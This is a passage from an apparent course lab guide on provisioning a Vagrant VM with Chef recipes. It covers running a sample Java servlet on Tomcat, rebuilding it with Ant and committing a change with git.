[\".\/cookbooks\/\"]\n chef.data_bags_path = [\".\/data_bags\/\"]\n chef.nodes_path = [\".\/nodes\/\"]\n chef.roles_path = [\".\/roles\/\"]\n chef.add_recipe \"shared::_apt-update\"\n chef.add_recipe \"git::default\"\n chef.add_recipe \"localAnt::default\"\n chef.add_recipe \"java7::default\" # this is redundant. we already installed this in base and tomcat also installs Java. but won't work w\/o it.\n chef.add_recipe \"localTomcat::v8\"\n chef.add_recipe \"shared::_junit\"\n chef.add_recipe \"manos::default\"\n end\n end\n....\n\nYou used a shell provisioner in your previous lab to apply your script to your new VM. But what's this? This line in the example above\n\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\nis commented out (the # means that Vagrant won't execute that line).\n\nRather than using another provisioner to install software on our VM, we are starting to use Chef. As mentioned in the http:\/\/dm-academy.github.io\/aitm\/#_policy_based_approaches[readings for Session 02], Chef is a configuration management system.\n\nNow, http:\/\/searchaws.techtarget.com\/definition\/Opscode-Chef[read a bit about Chef] and https:\/\/docs.chef.io\/chef_quick_overview.html[a bit more] before you continue.\n\nA full treatment of Chef is beyond the scope of this class. However, you should understand a few things. You should still be in your Calavera directory. Run the tree command:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree\n\n\u251c\u2500\u2500 Berksfile\n\u251c\u2500\u2500 Berksfile.lock\n\u251c\u2500\u2500 cookbooks\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 base\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 calaverahosts\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ssh.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _hosts.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _ssh.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 brazos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cara\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cerebro\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 post-receive\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 espina\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 hombros\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 hijoConfig.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 OLD-hijoInit.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 org.jfrog.hudson.ArtifactoryBuilder.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java7\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java8\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localAnt\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 env.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ant.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localJenkins\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localTomcat\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v6.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 v8.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 manos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 nervios\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 nervios.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 pies\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 pies.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 shared\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _apt-update.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _junit.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u251c\u2500\u2500 data_bags\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 README.txt\n\n(more files)\n....\n\nThe \".rb\" extension indicates the Ruby language, which is used to develop Chef scripts.\n\nTIP: If you are using Putty or some other terminal emulator and getting garbage characters like \u00e2\u00e2\u00e2 in your tree, see http:\/\/unix.stackexchange.com\/questions\/61293\/how-can-i-change-locale-encoding-to-avoid-getting-weird-characters-in-terminal[here].\n\nThis directory structure is the entire Calavera project, which is a simple DevOps simulation that all runs through Vagrant.\n\nExamine the Vagrantfile again (use `cat` or `more`), and notice in the Vagrantfile the directives:\n\n manos.vm.provision :chef_zero do |chef|\n\nThe above tells Vagrant to use Chef to set up the virtual machine.\n\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n\nThe above tells Chef where the cookbooks are.\n\n....\nchef.add_recipe \"shared::_apt-update\"\nchef.add_recipe \"git::default\"\nchef.add_recipe \"localAnt::default\"\nchef.add_recipe \"java7::default\"\nchef.add_recipe \"localTomcat::v8\"\nchef.add_recipe \"shared::_junit\"\nchef.add_recipe \"manos::default\"\n\n....\n\nFinally, the above tells Chef to apply a series of recipes from various parts of the tree. These recipes install software and configure the system in various ways.\n\n*Have a look at some of them.* Use \"cat.\"\n\n YourStudentID@serverXXX:~\/Calavera$ cat cookbooks\/localAnt\/recipes\/default.rb\n\nThe combination of these recipes precisely describes what the virtual machine will look like. If you delete a VM and bring it back up, it should look exactly the same every time.\n\nNow, the current Vagrantfile is a little dangerous, because if you type \"vagrant up\" it will try to bring up ALL of the machines. So, I have created a branch in git with a Vagrantfile for just the manos machine. Let's switch to that.\n\nReturn to the Calavera base directory and issue the following commands:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ cd ~\/Calavera\/\nYourStudentID@serverXXX:~\/Calavera$ git checkout Lab-03\nBranch Lab-03 set up to track remote branch Lab-03 from origin.\nSwitched to a new branch 'Lab-03'\n\n....\nNow, do \"cat Vagrantfile\". You should see that Manos is the only machine left.\n\nVagrant up manos:\n\n YourStudentID@serverXXX:~\/Calavera$ vagrant up manos\n\n....\nBringing machine 'manos' up with 'virtualbox' provider...\n==> manos: Box 'opscode-ubuntu-14.04a' could not be found. Attempting to find and install...\n manos: Box Provider: virtualbox\n manos: Box Version: >= 0\n==> manos: Box file was not detected as metadata. Adding it directly...\n==> manos: Adding box 'opscode-ubuntu-14.04a' (v0) for provider: virtualbox\n manos: Unpacking necessary files from: file:\/\/\/var\/vagrant\/boxes\/opscode-ubuntu-14.04a.box\n [more]\n....\n\nIt will take several minutes to launch the new Vagrant instance. In the meantime, YOU NEED TO WATCH THE OUTPUT.\n\nLook for the language \"Fixed port collision\" in a series like this. THE NUMBERS WILL BE DIFFERENT:\n\n....\n==> manos: Fixed port collision for 22 => 2234. Now on port 2201.\n==> manos: Fixed port collision for 80 => 8034. Now on port 2202.\n==> manos: Fixed port collision for 8080 => 8134. Now on port 2203.\n==> manos: Fixed port collision for 22 => 2222. Now on port 2214.\n==> manos: Clearing any previously set network interfaces...\n==> manos: Preparing network interfaces based on configuration...\n manos: Adapter 1: nat\n==> manos: Forwarding ports...\n manos: 22 => 2201 (adapter 1)\n manos: 80 => 2202 (adapter 1)\n manos: 8080 => 2203 (adapter 1)\n manos: 22 => 2214 (adapter 1)\n==> manos: Booting VM...\n....\n\nMAKE NOTE OF THE PORT 8080 MAPPING. In the above, it says \"Now on port 2203.\" You will have a DIFFERENT number. Write it down.\n\n****\nONLY *if you miss your port*, or can't find it, you will need to do:\n\n vboxmanage list vms\n\nYou should see output including something like:\n\n\"Calavera_manos_XXXXXXXXXXXXX_XXXXX\" {389dab0f-2f52-434e-bf50-c9792c42416a}\n\nGo:\n\n vboxmanage showvminfo Calavera_manos_XXXXXXXXXXXXX_XXXXX|more (replacing the X's with the actual numbers, you should cut and paste)\n\nLook for this line:\n\n....\nNIC 1 Rule(3): name = tcp8134, protocol = tcp, host ip = , host port = XXXX, guest ip = , guest port = 8080\n....\n\nCopy down the \"XXXX.\"\n****\n\nOnce you have your port 8080 mapping and the Vagrant launching process is complete, you can access your VM's web server. Manos comes preconfigured with a running Tomcat instance and a simple test-harness based Java application. You can see it running when you ssh into the VM:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sat Feb 21 22:03:53 2015 from 10.0.2.2\n....\n\nNext, run the curl command pointing at the running web application:\n....\nvagrant@manos:~$ curl localhost:8080\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\nWhat is \"curl\"? curl is like a web browser for the command line.\nFor more read @ http:\/\/curl.haxx.se\/docs\/manpage.html\n\nYou can also see the same thing from OUTSIDE your virtual machine:\n\n....\nvagrant@manos:~$ exit\nlogout\nConnection to 127.0.0.1 closed.\ntest4@seis660:~\/Calavera$ curl 127.0.0.1:2203\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\nIMPORTANT: Instead of typing 2203 for the port number, you should substitute the port number that 8080 was mapped to by Vagrant.\n\nFinally, you can view it in a real browser over X windows.\n\nNOTE: You may not find much use for X-windows in the outside world, but it is helpful here as it prevents us from worrying about hardening the local Vagrant VMs.\n\nFirst, be sure you logged into the server with X enabled. You need to either:\n\n* Check the box in Putty \/\/ For people using xming 6.9 above, there will be enable x11 forwarding checkbox under ssh.\n* go \"ssh -X YourStudentID@serverXXX\" if you are using your Mac console\n\nNOTE: You do *not* need Firefox on your local laptop for this to work. You *do* need to have X11 forwarding working, with a local Xwindows display. For example, if XMing is installed, open XLaunch and click through the screens with the defaults. See also https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Lab 00], Configuring X-Windows.\n\nType \"xclock\" for a quick test. See https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Configuring X-Windows] in Lab 00.\n\nAt the command line, go:\n....\nYourStudentID@serverXXX:~$ firefox -no-remote \"127.0.0.1:2203\/MainServlet\"\n\n(process:46597): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed\nGtk-Message: Failed to load module \"canberra-gtk-module\"\n....\n\nIt will throw a lot of errors, ignore them. You should (slowly) get a Firefox browser painted on your screen. This is X-windows in action, Firefox is actually running on the server.\n\nimage::browser2.png[]\n\nYou can either close Firefox or hit Command-C to exit.\n\nExit your VM.\n\n== A look at the application\n\nLet's look at what goes into making this little app work. First, how did it get there? If you are still in your VM, exit from the VM back to the classroom server. Be sure you are in the Calavera directory.\n\nYou can see the resources used by the application if you go:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree cookbooks\/manos\/\ncookbooks\/manos\/\n\u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u251c\u2500\u2500 metadata.rb\n\u2514\u2500\u2500 recipes\n \u2514\u2500\u2500 default.rb\n....\n\nNow, the cookbook here includes the raw ingredients (the contents of the cookbooks\/manos\/files directory) as well as the recipes of how to set them up on the VM. Especially, have a look at cookbooks\/manos\/recipes\/default.rb:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ more cookbooks\/manos\/recipes\/default.rb\n# manos-default\n\n# set up developer workstation\n\n# assuming Chef has set up Java, Tomcat, ant and junit\n# need to establish directory structure\n# move source code over\n\npackage \"tree\"\n\ngroup 'git'\n\nuser 'vagrant' do\n group 'git'\nend\n\n[\"\/home\/hijo\/src\/main\/config\",\n \"\/home\/hijo\/src\/main\/java\/biz\/calavera\",\n \"\/home\/hijo\/src\/test\/java\/biz\/calavera\",\n \"\/home\/hijo\/target\/biz\/calavera\"].each do | name |\n\n directory name do\n mode 00775\n action :create\n user \"vagrant\"\n group \"git\"\n recursive true\n end\nend\n\nfile_map = {\n \"INTERNAL_gitignore\" => \"\/home\/hijo\/.gitignore\",\n \"build.xml\" => \"\/home\/hijo\/build.xml\",\n \"web.xml\" => \"\/home\/hijo\/src\/main\/config\/web.xml\",\n \"Class1.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/Class1.java\",\n \"MainServlet.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/MainServlet.java\",\n \"TestClass1.java\" => \"\/home\/hijo\/src\/test\/java\/biz\/calavera\/TestClass1.java\"\n}\n\n# download each file and place it in right directory\nfile_map.each do | fileName, pathName |\n cookbook_file fileName do\n path pathName\n user \"vagrant\"\n group \"git\"\n action :create\n end\nend\n\n...\n....\n\nThere is more, but you get the idea. Without going into the https:\/\/en.wikipedia.org\/wiki\/Ruby_(programming_language)[Ruby] code this is written in (which would be too much detail for this class), this script is creating a set of directory structures on the new manos VM and populating them with the basic https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java] and https:\/\/en.wikipedia.org\/wiki\/Apache_Ant[Ant] files needed. For example, this command:\n\n \"build.xml\" => \"\/home\/hijo\/build.xml\"\n\nsays,\n\n. take the file called `build.xml` from the source files on the host, and\n. copy it into `\/home\/hijo\/build.xml` on the guest.\n\nGo back into your manos VM and have a look at the home\/hijo directory:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sun Feb 22 18:29:29 2015 from 10.0.2.2\n....\n\nNow run the tree command:\n\n....\nvagrant@manos:~$ tree \/home\/hijo\n\/home\/hijo\n\u251c\u2500\u2500 build.xml\n\u251c\u2500\u2500 src\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 main\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.java\n\u2514\u2500\u2500 target\n \u251c\u2500\u2500 biz\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.class\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.class\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.class\n \u251c\u2500\u2500 CalaveraMain.jar\n \u251c\u2500\u2500 result.txt\n \u251c\u2500\u2500 result.xml\n \u2514\u2500\u2500 web.xml\n\n....\n\nThat configured directory tree is the outcome of the Chef scripts that were applied when the first Vagrant up was done.\n\nWithout going deeply into object-oriented programming, this application has three major parts:\n\n. A main class that controls everything (`MainServlet.java`).\n. A class called `Class1.java` that does 2 things:\n.. Returns a string \"five\" when you call the `.five` method on the class\n.. Wraps any string with the tags <H1> and <\/H1>, turning it into an HTML heading 1 string.\n. A test class, `TestClass1.java`, that tests `Class1.java` (but not `MainServlet.java`, just because that gets complicated for a simple exercise like this).\n\nBut wait, there is more. How is Tomcat actually serving up the servlet?\n\nRun tree:\n\n....\nvagrant@manos:\/home\/hijo$ tree \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\u251c\u2500\u2500 lib\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 CalaveraMain.jar\n\u2514\u2500\u2500 web.xml\n\n1 directory, 2 files\n....\n\nIn order for the `CalaveraMain.jar` file to be served up, it needs to be put in the `WEB-INF\/lib` directory that Tomcat knows about, and the `web.xml` file needs to be updated as well. How did this happen?\n\nAnd as a matter of fact, where did that `CalaveraMain.jar` file come from, anyways? It wasn't part of the files stored in the cookbook...!? Go back and look.\n\nThis is where the magic of Ant comes in. `CalaveraMain.jar` is a **compiled and packaged** version of the java classes you see in the `java\/biz\/calavera` directory.\n\nBack when Java first came out, the developer would have to painstakingly compile and package the software by hand, move it manually to the Tomcat directory, and restart Tomcat. But with Ant (and similar tools like https:\/\/maven.apache.org\/[Maven]), we can do this all automatically. Go:\n\n....\nvagrant@manos:~$ cd \/home\/hijo\/\nvagrant@manos:\/home\/hijo$ sudo ant\nBuildfile: \/home\/hijo\/build.xml\n\ninit:\n [echo]\n [echo] \t\t\tComputer name is ${my_env.COMPUTERNAME}\n [echo] User name is root\n [echo] \t\t\tBuilding from \/home\/hijo\/build.xml\n [echo] \t\t\tJava is version 1.7\n [echo] \t\t\tProject is ${ant.project.name}\n [echo] \t\t\tAnt is Apache Ant(TM) version 1.9.4 compiled on April 29 2014\n [echo] \t\t\tBasedir is \/home\/hijo\n [echo] \t\t\tSource is .\/src\/main\/java\/biz\/calavera\n [echo] \t\t\tBuild target is .\/target\n [echo] \t\t\tDeployment target is \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n\ncompile:\n [javac] Compiling 2 source files to \/home\/hijo\/target\n [javac] Compiling 1 source file to \/home\/hijo\/target\n\ntest:\n [echo]\n [echo] \t\t\tentering test\n [echo]\n [junit] Running biz.calavera.TestClass1\n [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\ncompress:\n [jar] Building jar: \/home\/hijo\/target\/CalaveraMain.jar\n\ndeploy:\n [delete] Deleting directory \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [mkdir] Created dir: \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [copy] Copying 1 file to \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/lib\n [echo]\n [echo] \t\t\tAttempting Tomcat restart.\n [echo]\n [exec] The command attribute is deprecated.\n [exec] Please use the executable attribute and nested arg elements.\n [exec] * Stopping Tomcat servlet engine tomcat6\n [exec] ...done.\n [exec] The command attribute is deprecated.\n [exec] Please use the executable attribute and nested arg elements.\n [exec] * Starting Tomcat servlet engine tomcat6\n [exec] ...done.\n\nmain:\n [echo]\n [echo] \t\t\tbuilt and deployed to Tomcat.\n [echo]\n\nBUILD SUCCESSFUL\nTotal time: 8 seconds\n....\n\nTIP: Points to anyone who can rewrite the Ant script so that it's not using the deprecated Ant command attribute generating the warnings at the bottom.\n\nYou can see the Ant script at build.xml. Compare that script to the output. It is:\n\n- Running the junit tests (more on that later)\n- Compiling the java *.java files into *.class files\n- Packaging the *.java files into a *.jar file\n- Moving the jar file to the appropriate Tomcat directory, along with the web.xml configuration file\n- Restarting Tomcat\n\nIf you are interested in Ant further, you can see more about it at http:\/\/ant.apache.org\/.\n\n== Changing the application\n\nLet's play with the Java a little bit. Start by editing the MainServlet.java file:\n\n....\nvagrant@manos:\/home\/hijo$ nano src\/main\/java\/biz\/calavera\/MainServlet.java\n\n GNU nano 2.2.6 File: src\/main\/java\/biz\/calavera\/MainServlet.java Modified\n\npackage biz.calavera;\n\n\/\/package test;\n\nimport java.io.*;\nimport javax.servlet.*;\nimport javax.servlet.http.*;\n\npublic class MainServlet extends HttpServlet {\n \/\/ Import required java libraries\n\n private String message;\n\n public void init() throws ServletException\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n HttpServletResponse response)\n throws ServletException, IOException\n {\n \/\/ Set response content type\n response.setContentType(\"text\/html\");\n\n \/\/ Actual logic goes here.\n PrintWriter out = response.getWriter();\n Class1 oResp = new Class1(message);\n\n out.println(oResp.webMessage());\n }\n\n public void destroy()\n {\n \/\/ do nothing.\n }\n }\n....\n\nFind the line that says:\n\n message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nand change it to\n\n message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\"\n\nExit nano and run Ant again:\n\n vagrant@manos:\/home\/hijo$ sudo ant\n [ same output as before ]\n\nNow try:\n\n vagrant@manos:\/home\/hijo$ curl localhost:8080\/MainServlet\n <h1>YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n\nIf you did it correctly, you should see that Tomcat (via curl) is now serving up the change you made. Many automated steps were executed between you making that change and it appearing in curl!\n\nNOTE: If you want to see this in firefox, just open a *new* ssh session to SEIS660 with X enabled and don't go into your VM. Remember to use your specific mapped 8080 port number that Vagrant setup.\n\nLet's add it to git:\n....\nvagrant@manos:\/home\/hijo$ git add src\/main\/java\/biz\/calavera\/MainServlet.java\nvagrant@manos:\/home\/hijo$ git commit -m \"my local java\"\n[master 04ff3cb] my local java\n 1 file changed, 1 insertion(+), 1 deletion(-)\n....\nNOTE: Git is installed, with a repo initialized already in \/home\/hijo. If this were a completely new system, you would need to install git and init the repo.\n\nReview your change:\n\n....\nvagrant@manos:\/home\/hijo$ git log -p -1\ncommit 04ff3cb11264ed3429889512451722c3069b3264\nAuthor: Charles Betz <char@calavera.biz>\nDate: Sun Feb 22 19:44:19 2015 +0000\n\n my local java\n\ndiff --git a\/src\/main\/java\/biz\/calavera\/MainServlet.java b\/src\/main\/java\/biz\/calavera\/MainServlet.java\nindex 35cdac4..54f2be4 100644\n--- a\/src\/main\/java\/biz\/calavera\/MainServlet.java\n+++ b\/src\/main\/java\/biz\/calavera\/MainServlet.java\n@@ -15,7 +15,7 @@ public class MainServlet extends HttpServlet {\n {\n \/\/ Edit this message, save the file, and rebuild with Ant\n \/\/ to see it reflected on the Web page at http:\/\/localhost:8081\/MainServlet\n- message = \"This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n+ message = \"YourStudentID This is a skeleton application-- to explore the end to end Calavera delivery framework.\";\n }\n\n public void doGet(HttpServletRequest request,\n....\n\nHit `q` to get out of the git review.\n\nNow, let's break something.\n\nReview the test class:\n\n....\nvagrant@manos:\/home\/hijo$ more src\/test\/java\/biz\/calavera\/TestClass1.java\npackage biz.calavera;\n\nimport static org.junit.Assert.*;\n\nimport org.junit.After;\nimport org.junit.AfterClass;\nimport org.junit.Before;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\n\npublic class TestClass1 {\n\n\tprivate Class1 a;\n\n\t@BeforeClass\n\tpublic static void setUpBeforeClass() throws Exception {\n\t}\n\n\t@AfterClass\n\tpublic static void tearDownAfterClass() throws Exception {\n\t}\n\n\t@Before\n\tpublic void setUp() throws Exception 